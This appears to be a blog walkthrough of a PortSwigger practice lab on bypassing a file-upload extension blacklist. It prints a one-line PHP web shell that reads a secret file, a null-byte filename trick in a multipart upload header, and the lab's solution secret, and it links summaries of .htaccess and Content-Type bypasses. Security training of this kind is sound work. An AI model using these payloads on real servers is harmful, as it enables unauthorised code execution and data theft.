On this page
apsyleg1 min read
#portswigger #file-upload #rce #null-byte #web-security

Web Shell Upload via Obfuscated File Extension

Lab

Web shell upload via obfuscated file extension · Practitioner

Solution

Given

This lab contains a vulnerable image upload function. Certain file extensions
are blacklisted, but this defense can be bypassed using a classic obfuscation
technique.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the
contents of the file /home/carlos/secret. Submit this secret using the button
provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Analysis and recon

Shell is the same:

<?php echo file_get_contents('/home/carlos/secret'); ?>

Drop shell.php:

Sorry, only JPG & PNG files are allowed
Sorry, there was an error uploading your file.

So we have to convince the server it's a JPG or PNG. Let's go through the options.

  1. shell.php.jpg — uploaded, but it's served as an image, didn't work.
  2. The null byte trick did:
Content-Disposition: form-data; name="avatar"; filename="shell1.php%00.jpg"
Content-Type: application/x-php

Re4kTtunnIZsPQSV4FFhRmyNL6FO0gos

Lab solved!

More in this category

Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)

.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.

Remote Code Execution via Web Shell Upload (PortSwigger Lab)

Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.

Web Shell Upload via Content-Type Restriction Bypass (PortSwigger Lab)

The server only checks the Content-Type header — flip it to image/jpeg and the PHP shell sails through.